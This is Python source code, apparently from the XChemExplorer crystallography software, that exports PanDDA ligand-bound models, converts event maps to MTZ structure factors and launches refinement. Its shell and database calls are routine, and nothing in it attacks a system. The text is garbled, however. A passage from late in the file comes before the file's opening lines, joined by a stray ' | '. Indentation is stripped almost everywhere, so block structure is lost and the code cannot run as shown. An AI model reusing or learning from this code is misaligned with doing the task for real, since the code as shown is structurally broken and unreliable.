self.Logfile.insert('running cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
os.system('cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
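    # run CAD on the temporary mtz from phenix.map_to_structure_factors and rename its
    # amplitude/phase columns to the generic labels used here, e.g. F-obs/PHIF -> F_ampl/PHIF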
def remove_and_rename_column_labels(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=F-obs E2=PHIF\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: new column labels F_ampl,PHIF')
os.system(cmd)
def remove_and_rename_column_labels_after_cinvfft(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=event.F_phi.F E2=event.F_phi.phi\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: renaming event.F_phi.F -> F_ampl and event.F_phi.phi -> PHIF')
os.system(cmd)
def update_database(self):
sqlite = ( "update panddaTable set "
" PANDDA_site_event_map_mtz = '%s' " %os.path.join(self.project_directory,self.xtalID,self.event+'.mtz')+
" where PANDDA_site_event_map is '{0!s}' ".format(self.event_map)
)
self.db.execute_statement(sqlite)
self.Logfile.insert('updating data source: '+sqlite)
def clean_output_directory(self):
os.system('/bin/rm mask_targetcell.pdb')
os.system('/bin/rm mask_targetcell.msk')
os.system('/bin/rm onecell.map')
os.system('/bin/rm masked_targetcell.map')
os.system('/bin/rm masked_fullcell.map')
os.system('/bin/rm eventMap2sf.sh')
os.system('/bin/rm '+self.ligand_pdb)
class run_pandda_inspect_at_home(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def run(self):
os.chdir(os.path.join(self.panddaDir,'processed_datasets'))
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('parsing '+self.panddaDir)
for xtal in sorted(glob.glob('*')):
for files in glob.glob(xtal+'/ligand_files/*'):
if os.path.islink(files):
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'replacing symlink for {0!s} with real file'.format(files))
self.Logfile.insert('replacing symlink for {0!s} with real file'.format(files))
os.system('cp --remove-destination {0!s} {1!s}/ligand_files'.format(os.path.realpath(files), xtal))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
XChemToolTips.run_pandda_inspect_at_home(self.panddaDir)
class convert_apo_structures_to_mmcif(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def sf_convert_environment(self):
pdb_extract_init = ''
if os.path.isdir('/dls'):
pdb_extract_init = 'source /dls/science/groups/i04-1/software/pdb-extract-prod/setup.sh\n'
pdb_extract_init += '/dls/science/groups/i04-1/software/pdb-extract-prod/bin/sf_convert'
else:
pdb_extract_init = 'source ' + os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/setup.sh') + '\n'
            pdb_extract_init += os.path.join(os.getenv('XChemExplorer_DIR'),
                                             'pdb_extract/pdb-extract-prod/bin/sf_convert')
return pdb_extract_init
def run(self):
self.Logfile.insert('converting apo structures in pandda directory to mmcif files')
        self.Logfile.insert('changing to '+self.panddaDir)
        progress_step=1
        n_datasets=len(glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')))
        if n_datasets != 0:
            progress_step=100/float(n_datasets)
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
pdb_extract_init = self.sf_convert_environment()
self.Logfile.insert('parsing '+self.panddaDir)
for dirs in glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')):
xtal = dirs[dirs.rfind('/')+1:]
self.Logfile.insert('%s: converting %s to mmcif' %(xtal,xtal+'-pandda-input.mtz'))
if os.path.isfile(os.path.join(dirs,xtal+'-pandda-input.mtz')):
if os.path.isfile(os.path.join(dirs,xtal+'_sf.mmcif')):
self.Logfile.insert('%s: %s_sf.mmcif exists; skipping...' %(xtal,xtal))
else:
os.chdir(dirs)
Cmd = (pdb_extract_init +
' -o mmcif'
' -sf %s' % xtal+'-pandda-input.mtz' +
' -out {0!s}_sf.mmcif > {1!s}.sf_mmcif.log'.format(xtal, xtal))
self.Logfile.insert('running command: '+Cmd)
os.system(Cmd)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
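# cross-checks the ligands modelled in each refine.pdb of the project directory against the
# entries in the panddaTable and reports ligands that are missing from the database
# (e.g. ligands that were placed manually rather than with pandda.inspect)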
class check_number_of_modelled_ligands(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,db_file):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.db=XChemDB.data_source(db_file)
self.errorDict={}
def update_errorDict(self,xtal,message):
if xtal not in self.errorDict:
self.errorDict[xtal]=[]
self.errorDict[xtal].append(message)
def insert_new_row_in_panddaTable(self,xtal,ligand,site,dbDict):
resname= site[0]
chain= site[1]
seqnum= site[2]
altLoc= site[3]
x_site= site[5][0]
y_site= site[5][1]
z_site= site[5][2]
resnameSimilarSite= ligand[0]
chainSimilarSite= ligand[1]
seqnumSimilarSite= ligand[2]
siteList=[]
for entry in dbDict[xtal]:
siteList.append(str(entry[0]))
if entry[4] == resnameSimilarSite and entry[5] == chainSimilarSite and entry[6] == seqnumSimilarSite:
eventMap= str(entry[7])
eventMap_mtz= str(entry[8])
initialPDB= str(entry[9])
initialMTZ= str(entry[10])
event_id= str(entry[12])
PanDDApath= str(entry[13])
db_dict={
'PANDDA_site_index': str(int(max(siteList))+1),
'PANDDApath': PanDDApath,
'PANDDA_site_ligand_id': resname+'-'+chain+'-'+seqnum,
'PANDDA_site_ligand_resname': resname,
'PANDDA_site_ligand_chain': chain,
'PANDDA_site_ligand_sequence_number': seqnum,
'PANDDA_site_ligand_altLoc': 'D',
'PANDDA_site_event_index': event_id,
'PANDDA_site_event_map': eventMap,
'PANDDA_site_event_map_mtz': eventMap_mtz,
'PANDDA_site_initial_model': initialPDB,
'PANDDA_site_initial_mtz': initialMTZ,
'PANDDA_site_ligand_placed': 'True',
'PANDDA_site_x': x_site,
'PANDDA_site_y': y_site,
'PANDDA_site_z': z_site }
print xtal,db_dict
def run(self):
self.Logfile.insert('reading modelled ligands from panddaTable')
dbDict={}
sqlite = ( "select "
" CrystalName,"
" PANDDA_site_index,"
" PANDDA_site_x,"
" PANDDA_site_y,"
" PANDDA_site_z,"
" PANDDA_site_ligand_resname,"
" PANDDA_site_ligand_chain,"
" PANDDA_site_ligand_sequence_number,"
" PANDDA_site_event_map,"
" PANDDA_site_event_map_mtz,"
" PANDDA_site_initial_model,"
" PANDDA_site_initial_mtz,"
" RefinementOutcome,"
" PANDDA_site_event_index,"
" PANDDApath "
"from panddaTable " )
dbEntries=self.db.execute_statement(sqlite)
for item in dbEntries:
xtal= str(item[0])
site= str(item[1])
x= str(item[2])
y= str(item[3])
z= str(item[4])
resname= str(item[5])
chain= str(item[6])
seqnum= str(item[7])
eventMap= str(item[8])
eventMap_mtz= str(item[9])
initialPDB= str(item[10])
initialMTZ= str(item[11])
outcome= str(item[12])
event= str(item[13])
PanDDApath= str(item[14])
if xtal not in dbDict:
dbDict[xtal]=[]
dbDict[xtal].append([site,x,y,z,resname,chain,seqnum,eventMap,eventMap_mtz,initialPDB,initialMTZ,outcome,event,PanDDApath])
os.chdir(self.project_directory)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for xtal in sorted(glob.glob('*')):
if os.path.isfile(os.path.join(xtal,'refine.pdb')):
ligands=XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).ligand_details_as_list()
self.Logfile.insert('{0!s}: found file refine.pdb'.format(xtal))
if ligands:
if os.path.isdir(os.path.join(xtal,'xceTmp')):
os.system('/bin/rm -fr {0!s}'.format(os.path.join(xtal,'xceTmp')))
os.mkdir(os.path.join(xtal,'xceTmp'))
else:
self.Logfile.warning('{0!s}: cannot find ligand molecule in refine.pdb; skipping...'.format(xtal))
continue
made_sym_copies=False
ligands_not_in_panddaTable=[]
for n,item in enumerate(ligands):
resnameLIG= item[0]
chainLIG= item[1]
seqnumLIG= item[2]
altLocLIG= item[3]
occupancyLig= item[4]
if altLocLIG.replace(' ','') == '':
self.Logfile.insert(xtal+': found a ligand not modelled with pandda.inspect -> {0!s} {1!s} {2!s}'.format(resnameLIG, chainLIG, seqnumLIG))
residue_xyz = XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).get_center_of_gravity_of_residue_ish(item[1],item[2])
ligands[n].append(residue_xyz)
foundLigand=False
if xtal in dbDict:
for entry in dbDict[xtal]:
resnameTable=entry[4]
chainTable=entry[5]
seqnumTable=entry[6]
self.Logfile.insert('panddaTable: {0!s} {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
if resnameLIG == resnameTable and chainLIG == chainTable and seqnumLIG == seqnumTable:
self.Logfile.insert('{0!s}: found ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
foundLigand=True
if not foundLigand:
self.Logfile.error('{0!s}: did NOT find ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameLIG, chainLIG, seqnumLIG))
ligands_not_in_panddaTable.append([resnameLIG,chainLIG,seqnumLIG,altLocLIG,occupancyLig,residue_xyz])
else:
self.Logfile.warning('ligand in PDB file, but dataset not listed in panddaTable: {0!s} -> {1!s} {2!s} {3!s}'.format(xtal, item[0], item[1], item[2]))
for entry in ligands_not_in_panddaTable:
self.Logfile.error('{0!s}: refine.pdb contains a ligand that is not assigned in the panddaTable: {1!s} {2!s} {3!s} {4!s}'.format(xtal, entry[0], entry[1], entry[2], entry[3]))
for site in ligands_not_in_panddaTable:
for files in glob.glob(os.path.join(self.project_directory,xtal,'xceTmp','ligand_*_*.pdb')):
mol_xyz = XChemUtils.pdbtools(files).get_center_of_gravity_of_molecule_ish()
                        # now need to check if there is an unassigned entry in panddaTable that is close
for entry in dbDict[xtal]:
distance = XChemUtils.misc().calculate_distance_between_coordinates(mol_xyz[0], mol_xyz[1],mol_xyz[2],entry[1],entry[2], entry[3])
self.Logfile.insert('{0!s}: {1!s} {2!s} {3!s} <---> {4!s} {5!s} {6!s}'.format(xtal, mol_xyz[0], mol_xyz[1], mol_xyz[2], entry[1], entry[2], entry[3]))
self.Logfile.insert('{0!s}: symm equivalent molecule: {1!s}'.format(xtal, files))
self.Logfile.insert('{0!s}: distance: {1!s}'.format(xtal, str(distance)))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
if self.errorDict != {}:
self.update_errorDict('General','The aforementioned PDB files were automatically changed by XCE!\nPlease check and refine them!!!')
self.emit(QtCore.SIGNAL('show_error_dict'), self.errorDict)
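# for every dataset with refine.pdb/refine.mtz, converts the native PanDDA event maps to MTZ
# (with gemmi map2sf if available, otherwise mapmask expansion to P1 followed by
# phenix.map_to_structure_factors) and reports the correlation coefficient of each LIG residue
# against those maps using phenix.get_cc_mtz_pdb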
class find_event_map_for_ligand(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,external_software):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.external_software=external_software
try:
import gemmi
self.Logfile.insert('found gemmi library in ccp4-python')
except ImportError:
self.external_software['gemmi'] = False
self.Logfile.warning('cannot import gemmi; will use phenix.map_to_structure_factors instead')
def run(self):
self.Logfile.insert('======== checking ligand CC in event maps ========')
for dirs in sorted(glob.glob(os.path.join(self.project_directory,'*'))):
xtal = dirs[dirs.rfind('/')+1:]
if os.path.isfile(os.path.join(dirs,'refine.pdb')) and \
os.path.isfile(os.path.join(dirs,'refine.mtz')):
self.Logfile.insert('%s: found refine.pdb' %xtal)
os.chdir(dirs)
try:
p = gemmi.read_structure('refine.pdb')
except:
self.Logfile.error('gemmi library not available')
self.external_software['gemmi'] = False
reso = XChemUtils.mtztools('refine.mtz').get_dmin()
ligList = XChemUtils.pdbtools('refine.pdb').save_residues_with_resname(dirs,'LIG')
self.Logfile.insert('%s: found %s ligands of type LIG in refine.pdb' %(xtal,str(len(ligList))))
for maps in glob.glob(os.path.join(dirs,'*event*.native.ccp4')):
if self.external_software['gemmi']:
self.convert_map_to_sf_with_gemmi(maps,p)
else:
self.expand_map_to_p1(maps)
self.convert_map_to_sf(maps.replace('.ccp4','.P1.ccp4'),reso)
summary = ''
for lig in sorted(ligList):
if self.external_software['gemmi']:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
else:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native*P1.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
self.Logfile.insert('\nsummary of CC analysis:\n======================:\n'+summary)
def expand_map_to_p1(self,emap):
self.Logfile.insert('expanding map to P1: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.P1.ccp4')):
self.Logfile.warning('P1 map exists; skipping...')
return
cmd = ( 'mapmask MAPIN %s MAPOUT %s << eof\n' %(emap,emap.replace('.ccp4','.P1.ccp4'))+
' XYZLIM CELL\n'
' PAD 0.0\n'
' SYMMETRY 1\n'
'eof\n' )
os.system(cmd)
def convert_map_to_sf(self,emap,reso):
self.Logfile.insert('converting ccp4 map to mtz with phenix.map_to_structure_factors: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.map_to_structure_factors %s d_min=%s\n' %(emap,reso)+
'/bin/mv map_to_structure_factors.mtz %s' %emap.replace('.ccp4', '.mtz') )
os.system(cmd)
def get_lig_cc(self,mtz,lig):
self.Logfile.insert('calculating CC for %s in %s' %(lig,mtz))
if os.path.isfile(mtz.replace('.mtz', '_CC.log')):
self.Logfile.warning('logfile of CC analysis exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.get_cc_mtz_pdb %s %s > %s' % (mtz, lig, mtz.replace('.mtz', '_CC.log')) )
os.system(cmd)
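    # parse the phenix.get_cc_mtz_pdb logfile; the line starting with 'local' is assumed to
    # report the local map CC as its last field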
def check_lig_cc(self,log):
cc = 'n/a'
if os.path.isfile(log):
for line in open(log):
if line.startswith('local'):
cc = line.split()[len(line.split()) - 1]
else:
self.Logfile.error('logfile does not exist: %s' %log)
return cc
def convert_map_to_sf_with_gemmi(self,emap,p):
self.Logfile.insert('converting ccp4 map to mtz with gemmi map2sf: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = 'gemmi map2sf %s %s FWT PHWT --dmin=%s' %(emap,emap.replace('.ccp4','.mtz'),p.resolution)
self.Logfile.insert('converting map with command:\n' + cmd)
os.system(cmd) | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
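# exports ligand-bound PanDDA models from the pandda directory into the project directory:
# for each (new) *-pandda-model.pdb it matches the modelled LIG residues to PanDDA events,
# converts the corresponding event maps to structure factors, copies model and maps across,
# updates the database and starts an initial BUSTER refinement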
class export_and_refine_ligand_bound_models(QtCore.QThread):
def __init__(self,PanDDA_directory,datasource,project_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.PanDDA_directory = PanDDA_directory
self.datasource = datasource
self.db = XChemDB.data_source(self.datasource)
self.Logfile = XChemLog.updateLog(xce_logfile)
self.xce_logfile = xce_logfile
self.project_directory = project_directory
self.which_models=which_models
self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.initial_model_directory=initial_model_directory
# self.db.create_missing_columns()
# self.db_list=self.db.get_empty_db_dict()
# self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.xce_logfile=xce_logfile
# self.already_exported_models=[]
def run(self):
self.Logfile.warning(XChemToolTips.pandda_export_ligand_bound_models_only_disclaimer())
# find all folders with *-pandda-model.pdb
modelsDict = self.find_modeled_structures_and_timestamps()
# if only NEW models shall be exported, check timestamps
if not self.which_models.startswith('all'):
modelsDict = self.find_new_models(modelsDict)
# find pandda_inspect_events.csv and read in as pandas dataframe
inspect_csv = None
if os.path.isfile(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv')):
inspect_csv = pandas.read_csv(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv'))
progress = 0
        try:
            progress_step = 100/float(len(modelsDict))
        except ZeroDivisionError:
            self.Logfile.error('DID NOT FIND ANY MODELS TO EXPORT')
            return None
for xtal in sorted(modelsDict):
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
pandda_model = os.path.join('modelled_structures',xtal + '-pandda-model.pdb')
pdb = gemmi.read_structure(pandda_model)
# find out ligand event map relationship
ligandDict = XChemUtils.pdbtools_gemmi(pandda_model).center_of_mass_ligand_dict('LIG')
if ligandDict == {}:
self.Logfile.error(xtal + ': cannot find ligand of type LIG; skipping...')
continue
self.show_ligands_in_model(xtal,ligandDict)
emapLigandDict = self.find_ligands_matching_event_map(inspect_csv,xtal,ligandDict)
self.Logfile.warning('emapLigandDict' + str(emapLigandDict))
# convert event map to SF
self.event_map_to_sf(pdb.resolution,emapLigandDict)
# move existing event maps in project directory to old folder
self.move_old_event_to_backup_folder(xtal)
# copy event MTZ to project directory
self.copy_event_mtz_to_project_directory(xtal)
# copy pandda-model to project directory
self.copy_pandda_model_to_project_directory(xtal)
# make map from MTZ and cut around ligand
self.make_and_cut_map(xtal,emapLigandDict)
# update database
self.update_database(xtal,modelsDict)
# refine models
self.refine_exported_model(xtal)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
def update_database(self,xtal,modelsDict):
db_dict = {}
timestamp_file = modelsDict[xtal]
db_dict['DatePanDDAModelCreated'] = timestamp_file
db_dict['RefinementOutcome'] = '3 - In Refinement'
self.Logfile.insert('updating database for '+xtal+' setting time model was created to '+db_dict['DatePanDDAModelCreated'])
self.db.update_data_source(xtal,db_dict)
def make_and_cut_map(self,xtal,emapLigandDict):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
XChemUtils.pdbtools_gemmi(xtal + '-pandda-model.pdb').save_ligands_to_pdb('LIG')
for ligID in emapLigandDict:
m = emapLigandDict[ligID]
emtz = m.replace('.ccp4','_' + ligID + '.mtz')
emap = m.replace('.ccp4','_' + ligID + '.ccp4')
XChemUtils.maptools().calculate_map(emtz,'FWT','PHWT')
XChemUtils.maptools().cut_map_around_ligand(emap,ligID+'.pdb','7')
if os.path.isfile(emap.replace('.ccp4','_mapmask.ccp4')):
os.system('/bin/mv %s %s_%s_event.ccp4' %(emap.replace('.ccp4','_mapmask.ccp4'),xtal,ligID))
os.system('ln -s %s_%s_event.ccp4 %s_%s_event_cut.ccp4' %(xtal,ligID,xtal,ligID))
def copy_pandda_model_to_project_directory(self,xtal):
os.chdir(os.path.join(self.project_directory,xtal))
model = os.path.join(self.PanDDA_directory,'processed_datasets',xtal,'modelled_structures',xtal+'-pandda-model.pdb')
self.Logfile.insert('copying %s to project directory' %model)
os.system('/bin/cp %s .' %model)
def copy_event_mtz_to_project_directory(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
for emap in glob.glob('*-BDC_*.mtz'):
self.Logfile.insert('copying %s to %s...' %(emap,os.path.join(self.project_directory,xtal)))
os.system('/bin/cp %s %s' %(emap,os.path.join(self.project_directory,xtal)))
def move_old_event_to_backup_folder(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
if not os.path.isdir('event_map_backup'):
os.mkdir('event_map_backup')
self.Logfile.insert('moving existing event maps to event_map_backup')
for emap in glob.glob('*-BDC_*.ccp4'):
os.system('/bin/mv %s event_map_backup/%s' %(emap,emap+'.'+str(datetime.now()).replace(' ','_').replace(':','-')))
def show_ligands_in_model(self,xtal,ligandDict):
self.Logfile.insert(xtal + ': found the following ligands...')
for lig in ligandDict:
self.Logfile.insert(lig + ' -> coordinates ' + str(ligandDict[lig]))
def find_modeled_structures_and_timestamps(self):
self.Logfile.insert('finding out modelled structures in ' + self.PanDDA_directory)
modelsDict={}
for model in sorted(glob.glob(os.path.join(self.PanDDA_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb'))):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
modelsDict[sample]=timestamp
return modelsDict
def find_new_models(self,modelsDict):
samples_to_export = {}
self.Logfile.hint('XCE will never export/ refine models that are "5-deposition ready" or "6-deposited"')
self.Logfile.hint('Please change the RefinementOutcome flag in the Refinement table if you wish to re-export them')
self.Logfile.insert('checking timestamps of models in database...')
for xtal in modelsDict:
timestamp_file = modelsDict[xtal]
db_query=self.db.execute_statement("select DatePanDDAModelCreated from mainTable where CrystalName is '"+xtal+"' and (RefinementOutcome like '3%' or RefinementOutcome like '4%')")
try:
timestamp_db=str(db_query[0][0])
except IndexError:
self.Logfile.warning('%s: database query gave no results for DatePanDDAModelCreated; skipping...' %xtal)
self.Logfile.warning('%s: this might be a brand new model; will continue with export!' %xtal)
samples_to_export[xtal]=timestamp_file
timestamp_db = "2100-01-01 00:00:00" # some time in the future...
try:
difference=(datetime.strptime(timestamp_file,'%Y-%m-%d %H:%M:%S') - datetime.strptime(timestamp_db,'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+xtal+' -> was already refined, but newer PanDDA model available')
samples_to_export[xtal]=timestamp_file
else:
self.Logfile.insert('%s: model has not changed since it was created on %s' %(xtal,timestamp_db))
except (ValueError, IndexError), e:
self.Logfile.error(str(e))
return samples_to_export
def event_map_to_sf(self,resolution,emapLigandDict):
for lig in emapLigandDict:
emap = emapLigandDict[lig]
emtz = emap.replace('.ccp4','.mtz')
emtz_ligand = emap.replace('.ccp4','_' + lig + '.mtz')
self.Logfile.insert('trying to convert %s to SF -> %s' %(emap,emtz_ligand))
self.Logfile.insert('>>> ' + emtz)
XChemUtils.maptools_gemmi(emap).map_to_sf(resolution)
if os.path.isfile(emtz):
os.system('/bin/mv %s %s' %(emtz,emtz_ligand))
self.Logfile.insert('success; %s exists' %emtz_ligand)
else:
self.Logfile.warning('something went wrong; %s could not be created...' %emtz_ligand)
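    # match each event listed in pandda_inspect_events.csv for this crystal to a modelled LIG
    # residue by distance (see calculate_distance_to_ligands); an event map is only used if a
    # ligand lies within 7 A of the event coordinates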
def find_ligands_matching_event_map(self,inspect_csv,xtal,ligandDict):
emapLigandDict = {}
for index, row in inspect_csv.iterrows():
if row['dtag'] == xtal:
for emap in glob.glob('*-BDC_*.ccp4'):
self.Logfile.insert('checking if event and ligand are within 7A of each other')
x = float(row['x'])
y = float(row['y'])
z = float(row['z'])
matching_ligand = self.calculate_distance_to_ligands(ligandDict,x,y,z)
if matching_ligand is not None:
emapLigandDict[matching_ligand] = emap
self.Logfile.insert('found matching ligand (%s) for %s' %(matching_ligand,emap))
break
else:
self.Logfile.warning('current ligand not close to event...')
if emapLigandDict == {}:
self.Logfile.error('could not find ligands within 7A of PanDDA events')
return emapLigandDict
def calculate_distance_to_ligands(self,ligandDict,x,y,z):
matching_ligand = None
p_event = gemmi.Position(x, y, z)
for ligand in ligandDict:
c = ligandDict[ligand]
p_ligand = gemmi.Position(c[0], c[1], c[2])
self.Logfile.insert('coordinates ligand: ' + str(c[0])+' '+ str(c[1])+' '+str(c[2]))
self.Logfile.insert('coordinates event: ' + str(x)+' '+ str(y)+' '+str(z))
distance = p_event.dist(p_ligand)
self.Logfile.insert('distance between ligand and event: %s A' %str(distance))
if distance < 7:
matching_ligand = ligand
break
return matching_ligand
def refine_exported_model(self,xtal):
RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '',
'WATER': '',
'LIGOCC': '',
'SANITY': '' }
if 'nocheck' in self.which_models:
RefmacParams['SANITY'] = 'off'
self.Logfile.insert('trying to refine ' + xtal + '...')
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
        self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb')):
                self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.project_directory,xtal)
if not os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.project_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),RefmacParams,self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
else:
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.project_directory, xtal)))
class refine_bound_state_with_buster(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.which_models=which_models
self.already_exported_models=[]
def run(self):
samples_to_export=self.export_models()
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in sorted(samples_to_export):
self.Logfile.insert(xtal)
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
            self.Logfile.insert('%s: compound code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb')):
                    self.Logfile.insert('running initial refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
